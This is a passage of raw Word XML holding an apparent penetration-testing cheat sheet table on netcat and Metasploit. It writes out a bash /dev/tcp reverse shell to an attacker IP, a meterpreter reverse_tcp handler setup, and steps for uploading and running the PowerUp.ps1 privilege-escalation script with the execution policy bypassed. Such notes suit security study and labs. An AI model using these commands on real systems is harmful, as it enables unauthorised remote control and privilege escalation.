        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15476">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Netcat</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3"/>
        <w:gridCol w:w="8023"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F15476" w14:paraId="3BEDB484" w14:textId="77777777" w:rsidTr="000776E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2DE5083C" w14:textId="40F10CB8" w:rsidR="00F15476" w:rsidRDefault="00190FDB" w:rsidP="00622B62">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00F15476">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4679ACAE" w14:textId="77777777" w:rsidR="00F15476" w:rsidRDefault="00F15476" w:rsidP="00622B62">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>netcat</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(nc)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="44E2629B" w14:textId="77777777" w:rsidR="00F15476" w:rsidRDefault="00F15476" w:rsidP="00622B62">
            <w:r>
              <w:t>If we gain a foothold in a system, we often get a rubbish shell. We want to use netcat to call a reverse shell and thus have better control of the target machine.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15476" w14:paraId="49984816" w14:textId="77777777" w:rsidTr="000776E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="29330E7C" w14:textId="61868187" w:rsidR="00F15476" w:rsidRDefault="00190FDB" w:rsidP="00622B62">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00F15476">
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="26BF7F6B" w14:textId="77777777" w:rsidR="00F15476" w:rsidRDefault="00F15476" w:rsidP="00622B62">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1B87F394" w14:textId="77777777" w:rsidR="00F15476" w:rsidRDefault="00F15476" w:rsidP="00622B62">
            <w:r>
              <w:t>Use the command on your, listening, machine:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C209EE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C209EE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-lvnp </w:t>
            </w:r>
            <w:r w:rsidRPr="00C209EE">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">PORT NUMBER </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15476" w14:paraId="658966E1" w14:textId="77777777" w:rsidTr="000776E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="72124D3B" w14:textId="7F95AAAA" w:rsidR="00F15476" w:rsidRDefault="00190FDB" w:rsidP="00622B62">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00F15476">
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4329B716" w14:textId="77777777" w:rsidR="00F15476" w:rsidRDefault="00F15476" w:rsidP="00622B62">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="32619B23" w14:textId="77777777" w:rsidR="00F15476" w:rsidRDefault="00F15476" w:rsidP="00622B62">
            <w:r>
              <w:t>Use this command on an Apache, target, machine, if you gain access after setting up another netcat listener on your machine:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00176239">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">bash </w:t>
            </w:r>
            <w:r w:rsidRPr="00176239">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-c</w:t>
            </w:r>
            <w:r w:rsidRPr="00176239">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00176239">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>'bash -i &gt;&amp; /dev/tcp/</w:t>
            </w:r>
            <w:r w:rsidRPr="00176239">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>YOUR IP ADDRESS</w:t>
            </w:r>
            <w:r w:rsidRPr="00176239">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00F15476">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NEW</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PORTNUMBER</w:t>
            </w:r>
            <w:r w:rsidRPr="00176239">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00176239">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>0&gt;&amp;1'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005923C8" w14:paraId="71910A5D" w14:textId="77777777" w:rsidTr="000776E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="46639042" w14:textId="2EDB6FDD" w:rsidR="005923C8" w:rsidRDefault="00190FDB" w:rsidP="00622B62">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="005923C8">
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="19C0BC92" w14:textId="77777777" w:rsidR="005923C8" w:rsidRDefault="005923C8" w:rsidP="00622B62">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="000776E7">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(msfconsole can also be used to create a reverse shell listener)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62267E56" w14:textId="77777777" w:rsidR="005923C8" w:rsidRDefault="005923C8" w:rsidP="00622B62">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="74A1FF34" w14:textId="2AAA3CCE" w:rsidR="005923C8" w:rsidRDefault="005923C8" w:rsidP="00622B62">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(This works best when attacking a Windows machine)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7187F8E9" w14:textId="77777777" w:rsidR="005923C8" w:rsidRDefault="005923C8" w:rsidP="00622B62">
            <w:r>
              <w:t>You can also use msfconsole to set up a reverse shell listener:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007B5998">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>msfconsole</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007B5998">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">use </w:t>
            </w:r>
            <w:r w:rsidRPr="007B5998">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>exploit/multi/handler</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007B5998">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="007B5998">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>payload</w:t>
            </w:r>
            <w:r w:rsidRPr="007B5998">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007B5998">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>windows/meterpreter/reverse_tcp</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007B5998">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="007B5998">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>LHOST</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007B5998">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>HOST.IP.ADD.RESS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="034D7116" w14:textId="77777777" w:rsidR="005923C8" w:rsidRPr="007B5998" w:rsidRDefault="005923C8" w:rsidP="00622B62">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007B5998">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">set </w:t>
            </w:r>
            <w:r w:rsidRPr="007B5998">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>LPORT</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007B5998">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05C855D2" w14:textId="6B52B945" w:rsidR="005923C8" w:rsidRDefault="005923C8" w:rsidP="00622B62">
            <w:r>
              <w:t xml:space="preserve">Then simply enter </w:t>
            </w:r>
            <w:r w:rsidRPr="007B5998">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>run</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, or </w:t>
            </w:r>
            <w:r w:rsidRPr="007B5998">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>exploit</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005923C8" w14:paraId="2CB8E065" w14:textId="77777777" w:rsidTr="000776E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6AD7ABF5" w14:textId="68E34707" w:rsidR="005923C8" w:rsidRDefault="00190FDB" w:rsidP="00622B62">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="005923C8">
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6EECC678" w14:textId="77777777" w:rsidR="005923C8" w:rsidRDefault="005923C8" w:rsidP="00622B62">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2F11937E" w14:textId="77777777" w:rsidR="005923C8" w:rsidRDefault="005923C8" w:rsidP="00622B62">
            <w:r>
              <w:t>Once a reverse listener has been established (likely a meterpreter if in msfconsole) then you can use the upload command to upload any file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EF88FC3" w14:textId="408FDFF8" w:rsidR="005923C8" w:rsidRDefault="005923C8" w:rsidP="00622B62">
            <w:r>
              <w:t>First, check which directory you are currently working in and change if necessary:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F314FD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>pwd</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F314FD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F314FD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F314FD">
              <w:t>(This will change to the root directory, but feel free to go elsewhere)</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t xml:space="preserve">A good choice would be a Powersport privilege escalation script such as </w:t>
            </w:r>
            <w:r w:rsidRPr="00F314FD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PowerUp.ps1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21A5DC0C" w14:textId="77777777" w:rsidR="005923C8" w:rsidRDefault="005923C8" w:rsidP="00622B62">
            <w:pPr>
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F314FD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>upload</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F314FD">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F314FD">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>FILE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EB8724E" w14:textId="77777777" w:rsidR="005923C8" w:rsidRDefault="005923C8" w:rsidP="00622B62">
            <w:r w:rsidRPr="00F314FD">
              <w:t xml:space="preserve">Here, the malicious script will be uploaded to the current working directory and would be named </w:t>
            </w:r>
            <w:r w:rsidRPr="00F314FD">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>FILE</w:t>
            </w:r>
            <w:r w:rsidRPr="00F314FD">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A4EE757" w14:textId="77777777" w:rsidR="005923C8" w:rsidRDefault="005923C8" w:rsidP="00622B62">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Now, if using meterpreter, you can enter shell to gain a shell within the remote PC:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00635CFF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>shell</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C86DC2A" w14:textId="7E8249E7" w:rsidR="005923C8" w:rsidRDefault="005923C8" w:rsidP="00622B62">
            <w:r w:rsidRPr="00635CFF">
              <w:t>Then, we can use PowerShell within the windows machine to run the script:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00635CFF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">powershell </w:t>
            </w:r>
            <w:r w:rsidRPr="00635CFF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-ExecutionPolicy </w:t>
            </w:r>
            <w:r w:rsidRPr="00635CFF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">Bypass </w:t>
            </w:r>
            <w:r w:rsidRPr="00635CFF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-C </w:t>
            </w:r>
            <w:r w:rsidRPr="00635CFF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00635CFF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00635CFF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00635CFF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.\PowerUp.ps1;Invoke-AllChecks</w:t>
            </w:r>
            <w:r w:rsidRPr="00635CFF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00635CFF">
              <w:t>(All one command</w:t>
            </w:r>
            <w:r>
              <w:t>, notice a space between the two . . within the “ “</w:t>
            </w:r>
            <w:r w:rsidRPr="00635CFF">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005923C8" w14:paraId="14A37677" w14:textId="77777777" w:rsidTr="000776E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="36D67E89" w14:textId="235CB266" w:rsidR="005923C8" w:rsidRDefault="00190FDB" w:rsidP="00622B62">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="005923C8">
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5DC11DF1" w14:textId="77777777" w:rsidR="005923C8" w:rsidRDefault="005923C8" w:rsidP="00622B62">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="54A68E07" w14:textId="69BFB502" w:rsidR="005923C8" w:rsidRDefault="005923C8" w:rsidP="00622B62">
            <w:r>
              <w:t>Also, try running a VNC, once a meterpreter has been established with:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005923C8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>run vnc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00557003" w14:paraId="705E5FCB" w14:textId="77777777" w:rsidTr="000776E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="499C0F3A" w14:textId="1E5B3045" w:rsidR="00557003" w:rsidRDefault="00557003" w:rsidP="00622B62">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:t>.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="03010FBF" w14:textId="38D8E7D2" w:rsidR="00557003" w:rsidRDefault="00557003" w:rsidP="00622B62">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>netcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6C9B8664" w14:textId="5D3818D7" w:rsidR="00557003" w:rsidRDefault="00557003" w:rsidP="00622B62">
            <w:r>
              <w:t>We can possibly connect to ftp via netcat using:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AC5C689" w14:textId="05CD7B4A" w:rsidR="00557003" w:rsidRDefault="00557003" w:rsidP="00622B62">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00557003">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00557003">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">TARGET IP ADDRESS </w:t>
            </w:r>
            <w:r w:rsidRPr="00557003">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>PORT NUMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15476" w14:paraId="1B44694F" w14:textId="77777777" w:rsidTr="000776E7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="633CA56B" w14:textId="77777777" w:rsidR="00F15476" w:rsidRDefault="00F15476" w:rsidP="00622B62"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
